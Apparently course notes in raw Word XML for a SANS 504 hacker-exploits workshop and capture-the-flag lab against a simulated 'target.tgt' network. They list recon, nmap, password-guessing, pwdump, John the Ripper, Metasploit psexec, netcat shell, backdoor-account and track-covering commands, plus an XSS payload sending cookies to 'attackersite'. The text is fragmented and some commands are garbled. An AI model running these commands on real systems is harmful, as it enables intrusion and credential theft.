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30" w:rsidRPr="00F12230" w:rsidRDefault="00F12230" w:rsidP="00F1223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2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5) </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="00F122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504.6 - Computer &amp; Network Hacker Exploits, WORKSHOP </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00F12230" w:rsidRPr="00F12230" w:rsidRDefault="00F12230" w:rsidP="00F1223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12230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>504.6 - Hacker Tools Workshop\6.1 Hacker Exploits Hands-On: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Most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ImportantTools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to Use Today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Very Important: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: Port scanning and OS fingerprinting (Linux)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Nessus: Vulnerability scanning (Linux)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: Backdoors and file transfer (Windows and Linux)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: Determining users and groups, and password guessing (Windows)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Metasploit: Exploiting vulnerable targets (Linux and Windows)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John the Ripper: Password cracking (Linux and Windows)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Fgdump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: Remote SAM password hash dumper (Windows)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Everything you need to win the game is included in this environment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Step I: Overview of Reconnaissance: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Acquire Domain Name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Open Source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Whois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lookup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ARiNlookup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DNS Interrogation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Acquire Domain Name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No connection to the Internet (we want to control the environment), so we Will simulate the next steps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Let’s pick a target organization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How about an organization named “SANS 504 Target Company” with domain name “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target.tgt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”?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They are the owner of Target Widgets, producer of the finest Widgets in the world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Analyze their websites and think about the business service that each offers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Do a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Whois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search for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target.tgt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You will notice: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FRED.TARGET.TGT at 10.10.10.45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DNS Interrogation - Zone Transfer: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To perform a zone transfer, we can use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nslookup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in Windows or dig in Linux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Windows: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nslookup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&gt; server 10.10.10.45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&gt; ls -d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target.tgt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• Linux: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# dig @10.10.10.45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target.tgt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—t AXFR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Goal is to harvest target IP addresses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Step 2: Overview of Scanning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Ping Sweeping (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Port: Scanning (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OS Fingerprinting (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Vulnerability Scanning (Nessus)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Null Sessions (Windows)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Server Discovery — Exercise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, try to fill out information about the target servers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Use the templates earlier in this book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Draw a diagram of the network, based on the discovery phase (the diagram will be simple!)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Include the following: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Topology layout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IP addresses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Open ports, with services and versions if possible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Operating system type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Against Windows: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Don’t forget to run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against all discovered Windows machines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With various flags will be useful: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—U [target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IPaddr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—G [target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IPaddr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-D —u [user) —f [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password.lst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) [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targettP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— For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—D, please make sure your system can speak NTLMv1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Run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secpoLmsc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Go to Local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PoliciesSecurity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--&gt; Options --&gt; Network Security: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LAN Manager Authentication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Level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Make sure it is set to “Send LM &amp; NTLM responses”.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Step 3: Gaining Access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Run exploits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Depends on what was discovered during Phase 2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Automated password guessing?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Common Windows attacks?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Metasploit exploitation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cracked passwords?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Buffer overflow vulnerabilities?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Others?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Compromising Additional Machines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Once one machine is compromised, attackers can use it as a jumping off point for other attacks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Exploit Windows $MB sessions between target machines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Net use, at, etc.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Crack passwords, and look for systems where users have set up identical passwords on multiple machines.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Step 4: Keeping Access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Planting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backdoor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Use Metasploit shell or Meterpreter payloads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Deploying VNC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Others?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DO NOT put Rootkits on the target machines; too risky.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Step 5: Covering the Tracks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Creating hidden files on Linux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Directories named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Creating hidden files on Windows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Alternate data streams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forget about shell history files!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Could be useful for you to see what others are attempting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might want to cover your tracks by deleting your own shell histories on my machines.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Bulding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a Lab at Home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Windows 2012 Server, IIS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Linux, FTP Apache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Windows 8, File Sharing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, NFS,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Capture the Flag Contest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We’ll play a game of capture the flag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There are four regular flags and one bonus flag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flag1.txt, flag2.txt, flag3.txt, and flag4.txt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and bonusflag.txt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— All flags located in the top of the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directoiy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structure (inside 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\ on Windows and / in Linux)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Each flag provides you information about a “Phrase that pays"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Break in to my machines, look at the flags, and determine the phrase that pays.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Are you READY?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Remember the attack process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1. Reconnaissance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2. Scanning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3. Exploiting Systems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4. Keeping Access — Backdoors and Trojans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5. Covering the Tracks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Are there any questions on the ground rules or the Capture the Flag game?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ASK NOW!!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DNS Interrogation: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attempt a zone transfer from a Windows system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C:\&gt;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nslookup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—&gt; server 1O.1O.1O.45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-&gt; ls —d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target.tgt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attempt a zone transfer from a Unix system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#dig @10.10.10.45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target.tgt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—t AXFR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Run an “Aggressive”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scan (scan, OS fingerprint, version scan and NSE scripts) and save output to a file for future reference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#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—A &lt;target&gt; --reason —o &lt;file&gt;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Scan specific port(s) on target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#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-p &lt;port(s)&gt; &lt;target&gt; --reason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Perform a version scan on specific port(s)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sV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-p &lt;port(s)&gt; &lt;target&gt; --reason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Additional options you might find helpful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--reason         (shows target response)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--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packet_trace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    (shows packet details)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--traceroute         (shows network topology)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(to enumerate passwords):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To use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to enumerate information about a Windows target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Enumerate User Accounts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C: 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—U [target]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Enumerate Password Policy Information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C: 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—P [target]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Enumerate Groups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C: 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—G [target]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lastRenderedPageBreak/>
        <w:t>• You can combine the options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C: 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—UGP [target]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Run a dictionary attack against a target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C:\&gt;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—D —u [user] —f [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wordfile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] [target]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Appendix: Helpful commands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Pwdump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dump the passwords from a remote machine that you have an admin level user ID and password for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C:\&gt; pwdump3 10.10.10.9 [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] [user]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Then enter the password for the user id you used.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Metasploit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steps to setup an exploit/payload combo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we will use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psexec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once we know the username and password.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exploit/windows/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smb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psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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John The Ripper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Linux: To unshadow a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# unshadow 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/shadow &gt; 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/combined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Linux: To crack an un-shadowed password file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# john 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/combined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Windows: To crack a file with Windows hashes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C:\&gt; john &lt;hash file&gt;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Remember to delete “john.pot” when you want to restart a cracking session or it Will pick up where it left off.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Windows Net Commands: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create an Administrator-level account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C:\&gt; net user /add [user] [password]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C:\&gt; net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localgroup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administrators /add [user]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delete a user account that you’ve created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C:\&gt; net user [user] /delete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Map a local drive letter to the remote target’s C$ (requires Administrator-level credentials)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C:\&gt; net use * \\[target]\C$ [password] /u:[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targetlP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]\[user]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delete all of your net use sessions (careful)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C:\&gt; net use * /d /y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Remote Access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•VNC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— $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vncviewer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•$SH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$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User@&lt;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TargetIP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Telnet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$ telnet &lt;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TargetIP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• To create a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netcat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listener (Example)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lnvp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7777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connect to a port (Example)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nv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192.168.1.3 7777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shovel a shell (Linux Example)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#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lnvp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7777 —e /bin/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shovel a shell (Windows Example)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lnvp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7777 —e cmd.exe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To shovel the contents of a file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# no —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lnvp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7777 &lt; file.txt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set up a persistent Linux listener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# while [ 1 ]; do echo “Started”; no —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lnp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[port] —e /bin/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; done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Miscellaneous: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compile and run exploit code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- $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&lt;exploit source&gt; -o &lt;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$ ./&lt;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What user am I in Linux?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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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$ id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Become root if you have the password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Vi Editor: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open or create a new file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# vim &lt;file&gt;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Once in a file, to enable editing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— Press ‘a’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When done editing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Press ‘esc’ then ‘:‘ then ‘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!’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hide data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# echo “Hello there.” &gt; hideme.txt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# ./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./ls hideme.txt &gt; &lt;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outfile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• To retrieve data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# ./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-decode &lt;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stegofile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Enter password when prompted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 xml:space="preserve"> is in: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/home/tools/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hydan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Cross-Site Scripting Example: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To display an alert (example)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http: //counterhack.net/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search.php?word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=&lt;SCRIPT LANGUAGE=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F1223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F12230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;alert(“You are vulnerable to cross-site scripting! “);&lt;/SCRIPT&gt;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• Script to steal cookies from a victim (example)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- http://counterhack.net/search.php?word=&lt;SCRIPT&gt;document.location=‘http://attackersite/cgi-bin/grab.cgi?’%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2bdocument.cookie;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/SCRIPT&gt;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>Video!!!!!!</w:t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</w:r>
      <w:r w:rsidRPr="00F12230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">###############################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30"/>
    <w:rsid w:val="00D02CB1"/>
    <w:rsid w:val="00F1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56126-4FC3-4AFE-AE0C-380F19DC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230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2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2022-07-13T23:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-13T23:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>